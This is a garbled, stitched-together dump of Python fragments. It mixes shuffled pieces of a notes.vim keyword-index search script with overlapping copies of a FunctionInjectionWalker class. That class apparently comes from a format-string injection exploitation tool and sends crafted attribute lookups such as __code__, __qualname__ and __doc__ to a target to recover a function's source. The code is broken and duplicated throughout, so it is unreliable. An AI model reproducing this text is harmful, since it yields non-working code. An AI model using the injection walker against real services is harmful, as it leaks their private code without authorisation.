else: # Check whether previously seen note has changed? 
last_modified_on_disk", "%s\", filename) self.index['files'][filename] = last_modified with open(filename, encoding='utf-8') as handle: for kw in", "print(selection) print(self.encode(u'\\n'.join(selection))) def tokenize(self, text): \"\"\"Tokenize a string into a list of normalized,", "files to ignore during scans. INCLUDE_PATTERNS = {'*.md', '*.txt'} NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')] INDEX_FILE_PATH", "last_modified_on_disk) # Already checked this note, we can forget about it. del notes_on_disk[filename]", "to the index (assumes the note is not already indexed).\"\"\" logger.info(\"Adding file to", "disk. # # Author: <NAME> <<EMAIL>> # Last Change: November 1, 2015 #", "'ignore') return text def decode(self, text): \"\"\"Decode a string in the user's preferred", "..\", len(notes_on_disk)) # Check for updated and/or deleted notes since the last run?", "file: %s\", self.database_file) logger.debug(\"Notes directories: %r\", self.user_directories) logger.debug(\"Character encoding: %s\", self.character_encoding) if self.keyword_filter", "note is not already indexed).\"\"\" logger.info(\"Adding file to index: %s\", filename) index['files'][filename] =", "def usage(self): print(__doc__.strip()) class Timer: \"\"\"Easy to use timer to keep track of", "\"\"\"Easy to use timer to keep track of long during operations.\"\"\" def __init__(self):", "opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh', [ 'ignore-case', 'list=', 'database=', 'notes=', 'encoding=', 'verbose', 'help',", "error: print(str(error)) self.usage() sys.exit(2) # Define the command line option defaults. self.database_file =", "Timer() keywords = self.parse_args(argv or sys.argv[1:]) self.load_index() self.update_index() if self.dirty: self.save_index() if self.keyword_filter", "self.keyword_filter is not None: self.list_keywords(self.keyword_filter) logger.debug(\"Finished listing keywords in %s\", global_timer) else: matches", "return [self.normalize(k) for k in self.tokenize(' '.join(keywords))] def load_index(self): \"\"\"Load the keyword index", "appear at first sight :-). # # For more information about the Vim", "standard output.\"\"\" print('listing keywords') decorated = [] substring = self.normalize(substring) for kw, filenames", "of %i notes ..\", len(notes_on_disk)) # Check for updated and/or deleted notes since", "normalized_db_keywords: # Yes I'm using a nested for loop over all keywords in", "string in the user's preferred character encoding.\"\"\" if isinstance(text, str): text = codecs.encode(text,", "self.normalize(kw) if substring in normalized_kw: if Levenshtein is not None: decorated.append((Levenshtein.distance(normalized_kw, substring), -len(filenames),", "the user's preferred character encoding.\"\"\" if isinstance(text, bytes): text = codecs.decode(text, self.character_encoding, 'ignore')", "except ImportError: Levenshtein = None # The version of the index format that's", "else: matches &= submatches return sorted(matches) if matches else [] def update_index(self): \"\"\"Update", "it should rebuild the index. 
INDEX_VERSION = 3 # Filename matching patterns of", "in self.index['keywords']: self.index['keywords'][kw] = [x for x in self.index['keywords'][kw] if x != filename]", "__init__(self, argv=None): \"\"\"Entry point to the notes search.\"\"\" global_timer = Timer() keywords =", "in %s\", global_timer) else: matches = self.search_index(keywords) if matches: print('\\n'.join(sorted(matches))) logger.debug(\"Finished searching index", "in self.user_directories if os.path.isdir(d)] # Return tokenized keyword arguments. return [self.normalize(k) for k", "set directory with user notes (can be repeated) -e, --encoding=NAME set character encoding", "del self.index['files'][filename] for kw in self.index['keywords']: self.index['keywords'][kw] = [x for x in self.index['keywords'][kw]", "to load index from file!\", exc_info=True) self.first_use = True self.dirty = True self.index", "This Python script can be used by the notes.vim plug-in to perform fast", "self.index['files'][filename] = last_modified with open(filename, encoding='utf-8') as handle: for kw in self.tokenize(handle.read()): if", "strings are stored only # once, so it's not as bad as it", "keywords.\"\"\" return {w.strip() for w in re.findall(r'\\w{3,}', text, re.UNICODE) if not w.isspace()} def", "preferred character encoding.\"\"\" if isinstance(text, bytes): text = codecs.decode(text, self.character_encoding, 'ignore') return text", "much; # - Hundreds of notes can be searched in less than a", "self.index['keywords']: self.index['keywords'][kw] = [x for x in self.index['keywords'][kw] if x != filename] self.dirty", "of the given keywords.\"\"\" matches = None normalized_db_keywords = [(k, self.normalize(k)) for k", "logger.debug(\"Disabling case sensitivity\") elif opt in ('-l', '--list'): self.keyword_filter = arg.strip().lower() elif opt", "# once, so it's not as bad as it may appear at first", "= True self.dirty = True self.index = {'keywords': {}, 'files': {}, 'version': INDEX_VERSION}", "= last_modified with open(filename, encoding='utf-8') as handle: for kw in self.tokenize(handle.read()): if kw", "submatches.update(self.index['keywords'][original_db_kw]) if matches is None: matches = submatches else: matches &= submatches return", "(assumes the note is not already indexed).\"\"\" logger.info(\"Adding file to index: %s\", filename)", "if self.case_sensitive else keyword.lower() def encode(self, text): \"\"\"Encode a string in the user's", "\"\"\"Tokenize a string into a list of normalized, unique keywords.\"\"\" return {w.strip() for", "user_directories = self.notes_directories index = self.index # First we find the filenames and", "last_modified in notes_on_disk.items(): self.add_note_to_index(index, filename, last_modified) # TODO: Only save if necessary. self.save_index(INDEX_FILE_PATH,", "INDEX_VERSION = 3 # Filename matching patterns of files to ignore during scans.", "False logger.debug(\"Disabling case sensitivity\") elif opt in ('-l', '--list'): self.keyword_filter = arg.strip().lower() elif", "# fast. Also the pickle protocol makes sure repeating strings are stored only", "containing all of the given keywords.\"\"\" print('Searching index') index = load_index(INDEX_FILE_PATH) needles =", "checked this note, we can forget about it. 
del notes_on_disk[filename] # Add new", "\"\"\"Decode a string in the user's preferred character encoding.\"\"\" if isinstance(text, bytes): text", "elif opt in ('-l', '--list'): self.keyword_filter = arg.strip().lower() elif opt in ('-d', '--database'):", "{}, 'files': {}, 'version': INDEX_VERSION} def save_index(self): \"\"\"Save the keyword index to disk.\"\"\"", "last_modified_in_db = index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note_from_index(index, filename) self.add_note_to_index(index, filename, last_modified_on_disk) #", "if isinstance(text, str): text = codecs.encode(text, self.character_encoding, 'ignore') return text def decode(self, text):", "%s\", save_timer) def update_index(self): \"\"\"Update the keyword index by scanning the notes directory.\"\"\"", "def load_index(self): \"\"\"Load the keyword index or start with an empty one.\"\"\" try:", "(matching) keywords to standard output.\"\"\" print('listing keywords') decorated = [] substring = self.normalize(substring)", "\"\"\"Update the keyword index by scanning the notes directory.\"\"\" user_directories = self.notes_directories index", "= 3 # Filename matching patterns of files to ignore during scans. INCLUDE_PATTERNS", "The structure of the dictionary may seem very naive but it's quite #", "self.database_file = arg elif opt in ('-n', '--notes'): self.user_directories.append(arg) elif opt in ('-e',", "= index_location self.notes_directories = notes_directories self.index = load_index(self.index_location) def search(self, query: str) ->", "logger.info(\"Removing file from index: %s\", filename) del self.index['files'][filename] for kw in self.index['keywords']: self.index['keywords'][kw]", "self.index['keywords'].items(): normalized_kw = self.normalize(kw) if substring in normalized_kw: if Levenshtein is not None:", "False, \"Unhandled option\" logger.debug(\"Index file: %s\", self.database_file) logger.debug(\"Notes directories: %r\", self.user_directories) logger.debug(\"Character encoding:", "matching patterns of files to ignore during scans. INCLUDE_PATTERNS = {'*.md', '*.txt'} NOTES_DIRECTORIES", "--encoding=NAME set character encoding of notes -v, --verbose make more noise -h, --help", "notes to index. for filename, last_modified in notes_on_disk.items(): self.add_note(filename, last_modified) logger.info(\"Updated index in", "or more directories of plain text files using a full text index, updated", "codecs import fnmatch import getopt import logging import os import re import sys", "may appear at first sight :-). # # For more information about the", "sensitivity\") elif opt in ('-l', '--list'): self.keyword_filter = arg.strip().lower() elif opt in ('-d',", "else: return index class TextIndex: def __init__(self, index_location: str, notes_directories: List[str]): self.index_location =", "return index class TextIndex: def __init__(self, index_location: str, notes_directories: List[str]): self.index_location = index_location", "be repeated) -e, --encoding=NAME set character encoding of notes -v, --verbose make more", "= '~/.vim/misc/notes/index.pickle' self.user_directories = ['~/.vim/misc/notes/user/'] self.character_encoding = 'UTF-8' self.case_sensitive = True self.keyword_filter =", "timer to keep track of long during operations.\"\"\" def __init__(self): self.start_time = time.time()", "user_directories: for root, dirs, files in os.walk(directory): for filename in files: if any(fnmatch.fnmatch(filename,", "that's persisted using the pickle # module. 
The structure of the dictionary may", "= [self.munge_path(d) for d in self.user_directories if os.path.isdir(d)] # Return tokenized keyword arguments.", "True def delete_note(self, filename): \"\"\"Remove a note from the index.\"\"\" logger.info(\"Removing file from", "True self.index = {'keywords': {}, 'files': {}, 'version': INDEX_VERSION} def save_index(self): \"\"\"Save the", "long during operations.\"\"\" def __init__(self): self.start_time = time.time() def __str__(self): return \"%.2f seconds\"", "pickle.dump(index, handle) class NotesIndex: def __init__(self, argv=None): \"\"\"Entry point to the notes search.\"\"\"", "isinstance(text, bytes): text = codecs.decode(text, self.character_encoding, 'ignore') return text def munge_path(self, path): \"\"\"Canonicalize", "save_timer) def update_index(self): \"\"\"Update the keyword index by scanning the notes directory.\"\"\" update_timer", "path): \"\"\"Canonicalize user-defined path, making it absolute.\"\"\" return os.path.abspath(os.path.expanduser(path)) def usage(self): print(__doc__.strip()) class", "normalized_db_keywords = [(k, k.lower()) for k in index['keywords']] for word in needles: submatches", "directory in self.user_directories: print('Scanning', directory) for root, dirs, files in os.walk(directory): for filename", "existing index file is found with an # unsupported version, the script knows", "else [] def update_index(self): \"\"\"Update the keyword index by scanning the notes directory.\"\"\"", "('-n', '--notes'): self.user_directories.append(arg) elif opt in ('-e', '--encoding'): self.character_encoding = arg elif opt", "in notes_on_disk.items(): self.add_note(filename, last_modified) logger.info(\"Updated index in %s\", update_timer) def add_note(self, filename, last_modified):", "str): text = codecs.encode(text, self.character_encoding, 'ignore') return text def decode(self, text): \"\"\"Decode a", "= load_index(INDEX_FILE_PATH) needles = query.split() matches = None normalized_db_keywords = [(k, k.lower()) for", "ImportError: Levenshtein = None # The version of the index format that's supported", "load_index(index_location): try: load_timer = Timer() logger.debug(\"Loading index from %s ..\", index_location) with open(index_location,", "import time import pickle from typing import List, Set try: import Levenshtein except", "x != filename] self.dirty = True def search_index(self, keywords): \"\"\"Return names of files", "load_timer) except Exception: logger.warn(\"Failed to load index from file!\", exc_info=True) self.first_use = True", "to I'll probably come up with something more # efficient, but really it", "self.munge_path(self.database_file) self.user_directories = [self.munge_path(d) for d in self.user_directories if os.path.isdir(d)] # Return tokenized", "keywords.\"\"\" print('Searching index') index = load_index(INDEX_FILE_PATH) needles = query.split() matches = None normalized_db_keywords", "words.add(word) return words def normalize(self, keyword): \"\"\"Normalize the case of a keyword if", "d in decorated[:limit]] print(selection) print(self.encode(u'\\n'.join(selection))) def tokenize(self, text): \"\"\"Tokenize a string into a", "codecs.encode(text, self.character_encoding, 'ignore') return text def decode(self, text): \"\"\"Decode a string in the", "pickle.load(handle) logger.debug(\"Format version of index loaded from disk: %i\", index['version']) assert index['version'] ==", "logger.debug(\"Format version of index loaded from disk: %i\", self.index['version']) assert self.index['version'] == 
INDEX_VERSION,", "Timer() # First we find the filenames and last modified times of the", "dictionary that's persisted using the pickle # module. The structure of the dictionary", "index class TextIndex: def __init__(self, index_location: str, notes_directories: List[str]): self.index_location = index_location self.notes_directories", "case sensitivity\") elif opt in ('-l', '--list'): self.keyword_filter = arg.strip().lower() elif opt in", "= True def search_index(self, keywords): \"\"\"Return names of files containing all of the", "given keywords.\"\"\" matches = None normalized_db_keywords = [(k, self.normalize(k)) for k in self.index['keywords']]", "index.\"\"\" logger.info(\"Deleting file from index: %s\", filename) del index['files'][filename] for kw in index['keywords']:", "INDEX_VERSION, \"Incompatible index format detected!\" self.first_use = False self.dirty = False logger.debug(\"Loaded %i", "Check whether previously seen note has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = index['files'][filename]", "keyword index to disk.\"\"\" with open(database_file, 'wb') as handle: pickle.dump(index, handle) class NotesIndex:", "in index['keywords']: index['keywords'][kw] = [filename] else: index['keywords'][kw].append(filename) def delete_note_from_index(self, index, filename): \"\"\"Delete a", "= None # The version of the index format that's supported by this", "License: MIT # # This Python script can be used by the notes.vim", "the notes on disk. notes_on_disk = {} last_count = 0 for directory in" ]
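# A minimal illustrative sketch (not part of the original script) of the
# on-disk index layout that the code above reads and writes through pickle.
# The three keys and the keyword -> [filenames] / filename -> mtime mappings
# follow directly from load_index(), add_note() and save_index(); the
# concrete path, timestamp and keyword below are made-up examples.

import pickle

example_index = {
    'version': 3,  # INDEX_VERSION; a mismatch on load triggers a rebuild
    'files': {
        '/home/user/notes/todo.txt': 1446336000.0,  # absolute path -> mtime
    },
    'keywords': {
        'groceries': ['/home/user/notes/todo.txt'],  # keyword -> note files
    },
}

with open('/tmp/example-notes-index.pickle', 'wb') as handle:
    pickle.dump(example_index, handle)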
from inspect import signature as inspect_signature
from types import CodeType, FunctionType
from typing import (
    Iterator,
    Optional)

from .abstract_injection_walker import (
    AbstractInjectionWalker)
from .code_object_injection_walker import (
    CodeObjectInjectionWalker)
from .doc_string_injection_walker import (
    DocStringInjectionWalker)
from .failed_injection_walker import (
    FailedInjectionWalker)
from .name_injection_walker import (
    NameInjectionWalker)


class FunctionInjectionWalker(AbstractInjectionWalker):
    """Injection walker for a function.

    This module will attempt to recover the source code from a function,
    via access to its ``__code__`` attribute.

    """

    INJECTION_RE = None
    RESPONSE_RE = r'<function .+ at 0x[0-9a-fA-F]+>'

    def __extra_init__(
        self
    ) -> None:
        self._code_walker: Optional[CodeObjectInjectionWalker] = None
        self._name_walker: NameInjectionWalker = \
            self.empty_instance(NameInjectionWalker)
        self._docstring_walker: DocStringInjectionWalker = \
            self.empty_instance(DocStringInjectionWalker)
        self._src_code: Optional[str] = None
        self._signature: Optional[str] = None

    @property
    def code_walker(
        self
    ) -> Optional[CodeObjectInjectionWalker]:
        """The code object that this walker recovered from the target.

        This attribute will only be populated after a call to :func:`walk`.
        If the call to ``walk()`` cannot recover the object, then this
        attribute will remain as ``None``.

        """
        return self._code_walker

    @property
    def name_walker(
        self
    ) -> NameInjectionWalker:
        """Walker used to recover this function's __name__."""
        return self._name_walker

    @property
    def docstring_walker(
        self
    ) -> DocStringInjectionWalker:
        """Walker used to recover this function's __doc__ string."""
        return self._docstring_walker

    @property
    def src_code(
        self
    ) -> Optional[str]:
        """The source code that this walker recovered from the target."""
        return self._src_code

    @property
    def signature(
        self
    ) -> Optional[str]:
        """The decompiled function's signature, if one was retrieved."""
        return self._signature

    def walk(
        self
    ) -> Iterator[AbstractInjectionWalker]:
        yield from self._walk_name()

        if not self._name_walker.is_default:
            if self._name_walker.value in self._engine.function_blacklist:
                return
            self._engine.function_blacklist.add(self._name_walker.value)
            yield from self._walk_docstring()

        code_obj_injection = f'{self._injection_str}.__code__'
        raw_result = self._harness.send_injection(code_obj_injection)
        if raw_result is None:
            yield FailedInjectionWalker.msg(
                'Unable to recover injection response from string '
                f'{raw_result}')
            return

        walker = self.next_walker(code_obj_injection, raw_result)
        if walker is None:
            yield FailedInjectionWalker.msg(
                'No matching walker found for injection response '
                f'{raw_result}')
            return
        elif not isinstance(walker, CodeObjectInjectionWalker):
            yield FailedInjectionWalker.msg(
                f'Got {type(walker)} when injecting function __code__ '
                'attribute; something is terribly wrong...')
            return

        for sub_walker in walker.walk():
            yield sub_walker

        if walker.code_obj is None or walker.src_code is None:
            yield FailedInjectionWalker.msg(
                'Unable to successfully recover code object from walker '
                f'{walker.injection_str}')
            return

        src_lines = ([] if walker.src_code is None
                     else walker.src_code.splitlines())
        indented_src_lines = [f'    {line}' for line in src_lines]
        self._signature = self.__class__.code_obj_to_signature(
            walker.code_obj)
        self._src_code = f'{self._signature}\n'
        if self._docstring_walker.value:
            self._src_code += f'    """{self._docstring_walker.value}"""\n'
        self._src_code += '\n'.join(indented_src_lines)

        yield self

    def _walk_name(
        self
    ) -> Iterator[AbstractInjectionWalker]:
        """Recover the function's __name__ attribute."""
        name_injection = f'{self._injection_str}.__qualname__!r'
        result = self._harness.send_injection(name_injection)
        if result is None:
            yield FailedInjectionWalker.msg(
                'Unable to read __name__ of function via injection '
                f'{name_injection}')
            return

        walker = self.next_walker(name_injection, result)
        if not isinstance(walker, NameInjectionWalker):
            yield FailedInjectionWalker.msg(
                f'Expected a name walker when sending {name_injection} '
                f'but got {walker.__class__.__qualname__} instead')
            return

        yield from walker.walk()
        self._name_walker = walker

    def _walk_docstring(
        self
    ) -> Iterator[AbstractInjectionWalker]:
        """Recover the function's __doc__ attribute."""
        doc_string_injection = f'{self._injection_str}.__doc__!r'
        result = self._harness.send_injection(doc_string_injection)
        if result is None:
            yield FailedInjectionWalker.msg(
                'Unable to read __doc__ of function via injection '
                f'{doc_string_injection}')
            return

        walker = self.next_walker(doc_string_injection, result)
        if not isinstance(walker, DocStringInjectionWalker):
            yield FailedInjectionWalker.msg(
                f'Expected a doc walker when sending {doc_string_injection} '
                f'but got {walker.__class__.__qualname__} instead')
            return

        yield from walker.walk()
        self._docstring_walker = walker

    @staticmethod
    def code_obj_to_signature(
        code_obj: CodeType
    ) -> str:
        """Get a function signature from a code object.

        See:
            https://stackoverflow.com/a/56761306/5094008

        """
        try:
            func = FunctionType(code_obj, {})
            arg_sequence = inspect_signature(func)
            return f'def {code_obj.co_name}{arg_sequence}:'
        except TypeError:
            # build our own signature
            return f"""\
# exact argument names could not be reversed for below signature
def {code_obj.co_name}(*args, **kwargs):"""

    def __str__(
        self
    ) -> str:
        # The exact message is not recoverable from the dump; this return
        # value is a best-effort reconstruction.
        return f'Injected function with string {self._injection_str}'
\"\"\" return self._code_walker @property def name_walker( self ) -> NameInjectionWalker:", "return self._engine.function_blacklist.add(self._name_walker.value) yield from self._walk_docstring() code_obj_injection = f'{self._injection_str}.__code__' raw_result = self._harness.send_injection(code_obj_injection) if raw_result", "raw_result is None: yield FailedInjectionWalker.msg( 'Unable to recover injection response from string '", "from self._walk_name() if not self._name_walker.is_default: if self._name_walker.value in self._engine.function_blacklist: return self._engine.function_blacklist.add(self._name_walker.value) yield from", "f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines) yield self def _walk_name( self ) -> Iterator[AbstractInjectionWalker]:", "used to recover this function's __name__.\"\"\" return self._name_walker @property def docstring_walker( self )", "self._walk_docstring() code_obj_injection = f'{self._injection_str}.__code__' raw_result = self._harness.send_injection(code_obj_injection) if raw_result is None: yield FailedInjectionWalker.msg(", "= walker @staticmethod def code_obj_to_signature( code_obj: CodeType ) -> str: \"\"\"Get a function", "doc walker when sending {doc_string_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from", "NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for a function. This module will attempt to", "walker = self.next_walker(code_obj_injection, raw_result) if walker is None: yield FailedInjectionWalker.msg( 'No matching walker", "injection response from string ' f'{raw_result}') return walker = self.next_walker(code_obj_injection, raw_result) if walker", "if one was retrieved.\"\"\" return self._signature def walk( self ) -> Iterator[AbstractInjectionWalker]: yield", "self._signature = self.__class__.code_obj_to_signature( walker.code_obj) self._src_code = f'{self._signature}\\n' if self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n'", "None @property def code_walker( self ) -> Optional[CodeObjectInjectionWalker]: \"\"\"The code object that this", "``walk()`` cannot recover the object, then this attribute will remain as ``None``. \"\"\"", "function, via access to its ``__code__`` attribute. 
\"\"\" INJECTION_RE = None RESPONSE_RE =", "the FunctionInjectionWalker class.\"\"\" from inspect import ( signature as inspect_signature) from types import", "= self.next_walker(doc_string_injection, result) if not isinstance(walker, DocStringInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a doc walker", "when injecting function __code__ ' 'attribute; something is terribly wrong...') return for sub_walker", "if result is None: yield FailedInjectionWalker.msg( 'Unable to read __name__ of function via", "'Unable to recover injection response from string ' f'{raw_result}') return walker = self.next_walker(code_obj_injection,", "( signature as inspect_signature) from types import ( CodeType, FunctionType) from typing import", ") -> Iterator[AbstractInjectionWalker]: yield from self._walk_name() if not self._name_walker.is_default: if self._name_walker.value in self._engine.function_blacklist:", "elif not isinstance(walker, CodeObjectInjectionWalker): yield FailedInjectionWalker.msg( f'Got {type(walker)} when injecting function __code__ '", "from .abstract_injection_walker import ( AbstractInjectionWalker) from .code_object_injection_walker import ( CodeObjectInjectionWalker) from .doc_string_injection_walker import", "self ) -> Optional[str]: \"\"\"The decompiled function's signature, if one was retrieved.\"\"\" return", "CodeObjectInjectionWalker) from .doc_string_injection_walker import ( DocStringInjectionWalker) from .failed_injection_walker import ( FailedInjectionWalker) from .name_injection_walker", "this function's __doc__ string.\"\"\" return self._docstring_walker @property def src_code( self ) -> Optional[str]:", "is None or walker.src_code is None: yield FailedInjectionWalker.msg( 'Unable to successfully recover code", "is None: yield FailedInjectionWalker.msg( 'Unable to successfully recover code object from string '", "'\\n'.join(indented_src_lines) yield self def _walk_name( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __name__", "\"\"\"Get a function signature from a code object. See: https://stackoverflow.com/a/56761306/5094008 \"\"\" try: func", "f'{raw_result}') return walker = self.next_walker(code_obj_injection, raw_result) if walker is None: yield FailedInjectionWalker.msg( 'No", "\"\"\"The source code that this walker recovered from the target.\"\"\" return self._src_code @property", "' f'{doc_string_injection}') return walker = self.next_walker(doc_string_injection, result) if not isinstance(walker, DocStringInjectionWalker): yield FailedInjectionWalker.msg(", "a function, via access to its ``__code__`` attribute. \"\"\" INJECTION_RE = None RESPONSE_RE", "self._src_code @property def signature( self ) -> Optional[str]: \"\"\"The decompiled function's signature, if", "from a code object. 
See: https://stackoverflow.com/a/56761306/5094008 \"\"\" try: func = FunctionType(code_obj, {}) arg_sequence", "module will attempt to recover the source code from a function, via access", "__doc__ attribute.\"\"\" doc_string_injection = f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection) if result is None: yield", "self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str] = None self._signature: Optional[str] = None @property def code_walker( self", "walker found for injection response ' f'{raw_result}') return elif not isinstance(walker, CodeObjectInjectionWalker): yield", "function's __doc__ attribute.\"\"\" doc_string_injection = f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection) if result is None:", "( CodeType, FunctionType) from typing import ( Iterator, Optional) from .abstract_injection_walker import (", "\\ self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str] = None self._signature: Optional[str] = None @property def code_walker(", "types import ( CodeType, FunctionType) from typing import ( Iterator, Optional) from .abstract_injection_walker", "NameInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a name walker when sending {name_injection} ' f'but got", "Optional[str]: \"\"\"The source code that this walker recovered from the target.\"\"\" return self._src_code", "function __code__ ' 'attribute; something is terribly wrong...') return for sub_walker in walker.walk():", "FailedInjectionWalker.msg( 'Unable to read __doc__ of function via injection ' f'{doc_string_injection}') return walker", "code_obj: CodeType ) -> str: \"\"\"Get a function signature from a code object.", "one was retrieved.\"\"\" return self._signature def walk( self ) -> Iterator[AbstractInjectionWalker]: yield from", "= f'{self._injection_str}.__code__' raw_result = self._harness.send_injection(code_obj_injection) if raw_result is None: yield FailedInjectionWalker.msg( 'Unable to", "if self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines) yield self def _walk_name(", "'No matching walker found for injection response ' f'{raw_result}') return elif not isinstance(walker,", "def docstring_walker( self ) -> DocStringInjectionWalker: \"\"\"Walker used to recover this function's __doc__", "injecting function __code__ ' 'attribute; something is terribly wrong...') return for sub_walker in", "sending {name_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._name_walker =", "terribly wrong...') return for sub_walker in walker.walk(): yield sub_walker if walker.code_obj is None", "@staticmethod def code_obj_to_signature( code_obj: CodeType ) -> str: \"\"\"Get a function signature from", "from .doc_string_injection_walker import ( DocStringInjectionWalker) from .failed_injection_walker import ( FailedInjectionWalker) from .name_injection_walker import", "self._harness.send_injection(doc_string_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable to read __doc__ of function", "{code_obj.co_name}(*args, **kwargs):\"\"\" def __str__( self ) -> str: return f'Injected function object with", "the call to ``walk()`` cannot recover the object, then this attribute will remain", "self.next_walker(code_obj_injection, raw_result) if walker is None: yield FailedInjectionWalker.msg( 'No matching walker found for", "response ' 
f'{raw_result}') return elif not isinstance(walker, CodeObjectInjectionWalker): yield FailedInjectionWalker.msg( f'Got {type(walker)} when", "\"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines) yield self def _walk_name( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover", "to read __name__ of function via injection ' f'{name_injection}') return walker = self.next_walker(name_injection,", "NameInjectionWalker: \"\"\"Walker used to recover this function's __name__.\"\"\" return self._name_walker @property def docstring_walker(", "return walker = self.next_walker(name_injection, result) if not isinstance(walker, NameInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a", "to successfully recover code object from string ' f'{walker.injection_str}') return src_lines = ([]", "self._name_walker = walker def _walk_docstring( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __doc__", "\"\"\"Implementation of the FunctionInjectionWalker class.\"\"\" from inspect import ( signature as inspect_signature) from", "as inspect_signature) from types import ( CodeType, FunctionType) from typing import ( Iterator,", "is None: yield FailedInjectionWalker.msg( 'Unable to recover injection response from string ' f'{raw_result}')", "to its ``__code__`` attribute. \"\"\" INJECTION_RE = None RESPONSE_RE = r'<function .+ at", "result = self._harness.send_injection(name_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable to read __name__", "yield FailedInjectionWalker.msg( f'Got {type(walker)} when injecting function __code__ ' 'attribute; something is terribly", "used to recover this function's __doc__ string.\"\"\" return self._docstring_walker @property def src_code( self", "FunctionInjectionWalker class.\"\"\" from inspect import ( signature as inspect_signature) from types import (", "walker = self.next_walker(doc_string_injection, result) if not isinstance(walker, DocStringInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a doc", ") -> NameInjectionWalker: \"\"\"Walker used to recover this function's __name__.\"\"\" return self._name_walker @property", "raw_result) if walker is None: yield FailedInjectionWalker.msg( 'No matching walker found for injection", "return f'def {code_obj.co_name}{arg_sequence}:' except TypeError: # build our own signature return f\"\"\"\\ #", "call to :func:`walk`. If the call to ``walk()`` cannot recover the object, then", "from self._walk_docstring() code_obj_injection = f'{self._injection_str}.__code__' raw_result = self._harness.send_injection(code_obj_injection) if raw_result is None: yield", "self._docstring_walker = walker @staticmethod def code_obj_to_signature( code_obj: CodeType ) -> str: \"\"\"Get a", "target. This attribute will only be populated after a call to :func:`walk`. 
If", "if not isinstance(walker, NameInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a name walker when sending {name_injection}", "def _walk_name( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __name__ attribute.\"\"\" name_injection =", "\"\"\" return self._code_walker @property def name_walker( self ) -> NameInjectionWalker: \"\"\"Walker used to", "None: yield FailedInjectionWalker.msg( 'Unable to recover injection response from string ' f'{raw_result}') return", "f'{name_injection}') return walker = self.next_walker(name_injection, result) if not isinstance(walker, NameInjectionWalker): yield FailedInjectionWalker.msg( f'Expected", "f\"\"\"\\ # exact argument names could not be reversed for below signature def", "self.next_walker(doc_string_injection, result) if not isinstance(walker, DocStringInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a doc walker when", "from types import ( CodeType, FunctionType) from typing import ( Iterator, Optional) from", "to :func:`walk`. If the call to ``walk()`` cannot recover the object, then this", "to recover this function's __doc__ string.\"\"\" return self._docstring_walker @property def src_code( self )", "__name__ of function via injection ' f'{name_injection}') return walker = self.next_walker(name_injection, result) if", "in walker.walk(): yield sub_walker if walker.code_obj is None or walker.src_code is None: yield", "from the target.\"\"\" return self._src_code @property def signature( self ) -> Optional[str]: \"\"\"The", "'Unable to successfully recover code object from string ' f'{walker.injection_str}') return src_lines =", "= None self._signature: Optional[str] = None @property def code_walker( self ) -> Optional[CodeObjectInjectionWalker]:", "= self.__class__.code_obj_to_signature( walker.code_obj) self._src_code = f'{self._signature}\\n' if self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code", "sub_walker in walker.walk(): yield sub_walker if walker.code_obj is None or walker.src_code is None:", "Optional[str] = None self._signature: Optional[str] = None @property def code_walker( self ) ->", "FailedInjectionWalker.msg( f'Expected a doc walker when sending {doc_string_injection} ' f'but got {walker.__class__.__qualname__} instead')", "return self._docstring_walker @property def src_code( self ) -> Optional[str]: \"\"\"The source code that", "+= f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines) yield self def _walk_name( self ) ->", "object from string ' f'{walker.injection_str}') return src_lines = ([] if walker.src_code is None", "CodeType ) -> str: \"\"\"Get a function signature from a code object. See:", "def __extra_init__( self ) -> None: self._code_walker: Optional[CodeObjectInjectionWalker] = None self._name_walker: NameInjectionWalker =", ") -> str: \"\"\"Get a function signature from a code object. 
See: https://stackoverflow.com/a/56761306/5094008", "if raw_result is None: yield FailedInjectionWalker.msg( 'Unable to recover injection response from string", "signature as inspect_signature) from types import ( CodeType, FunctionType) from typing import (", "function's __name__ attribute.\"\"\" name_injection = f'{self._injection_str}.__qualname__!r' result = self._harness.send_injection(name_injection) if result is None:", "self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines) yield self def _walk_name( self", "DocStringInjectionWalker = \\ self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str] = None self._signature: Optional[str] = None @property", "__doc__ string.\"\"\" return self._docstring_walker @property def src_code( self ) -> Optional[str]: \"\"\"The source", "isinstance(walker, NameInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a name walker when sending {name_injection} ' f'but", "string ' f'{raw_result}') return walker = self.next_walker(code_obj_injection, raw_result) if walker is None: yield", "CodeObjectInjectionWalker): yield FailedInjectionWalker.msg( f'Got {type(walker)} when injecting function __code__ ' 'attribute; something is", ".doc_string_injection_walker import ( DocStringInjectionWalker) from .failed_injection_walker import ( 